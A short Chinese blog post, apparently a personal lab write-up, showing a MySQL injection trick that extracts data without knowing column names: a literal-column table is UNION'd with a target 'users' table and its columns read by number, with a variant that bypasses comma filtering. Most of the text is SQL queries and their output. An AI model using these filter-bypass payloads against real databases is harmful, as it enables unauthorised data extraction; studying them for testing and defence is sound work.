MySQL注入绕过过滤字段名

昨晚得知一种可以不知道字段名也可以注入出数据的技巧,赶快来试了一下。其核心在将一个可控的虚拟表V1与需要查询的真实表V2联合起来(使用union select),使得表字段可控从而查询数据。

首先创建一个和需要查询的表有相同列数的虚拟表

1
2
3
4
5
6
7
mysql> select * from ((select 1)a,(select 2)b,(select 3)c);
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.00 sec)

也可以使用DUAL表

1
2
3
4
5
6
7
mysql> select 1,2,3 from DUAL;
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.00 sec)

将此表与需要注入的表联合查询,需要数字在前。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
mysql> select 1,2,3 from DUAL union select * from users;
+-----+----------------------+------+
| 1 | 2 | 3 |
+-----+----------------------+------+
| 1 | 2 | 3 |
| 1 | 0 | aaaa |
| 2 | Angelina | aaaa |
| 3 | Dummy | aaaa |
| 4 | secure | aaaa |
| 5 | stupid | aaaa |
| 6 | superman | aaaa |
| 7 | batman | aaaa |
| 8 | admin | aaaa |
| 9 | admin1 | aaaa |
| 10 | admin2 | aaaa |
| 11 | admin3 | aaaa |
| 12 | dhakkan | aaaa |
| 14 | admin4 | aaaa |
| 15 | Homaebic | aaaa |
| 16 | admin | aaaa |
| 18 | admin | aaaa |
| 100 | homaebic | aaaa |
| 101 | homaebic' | aaaa |
+-----+----------------------+------+
19 rows in set (0.00 sec)

此时查询出来的表字段名可控。将他命名为新表a,即可使用a.3的方法访问特定字段。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
mysql> select a.3 from (select 1,2,3 from DUAL union select * from users)a;
+------+
| 3 |
+------+
| 3 |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
+------+
19 rows in set (0.00 sec)

查询特定列数

1
2
3
4
5
6
7
mysql> select a.3 from (select 1,2,3 from DUAL union select * from users)a limit 3,1;
+------+
| 3 |
+------+
| aaaa |
+------+
1 row in set (0.00 sec)

如果过滤了逗号

1
2
3
4
5
6
7
mysql> select d.3 from (select * from (select 1)a join (select 2)b join (select 3)c union select * from users)d limit 1 offset 3;
+------+
| 3 |
+------+
| aaaa |
+------+
1 row in set (0.00 sec)

支持一下
扫一扫,支持forsigner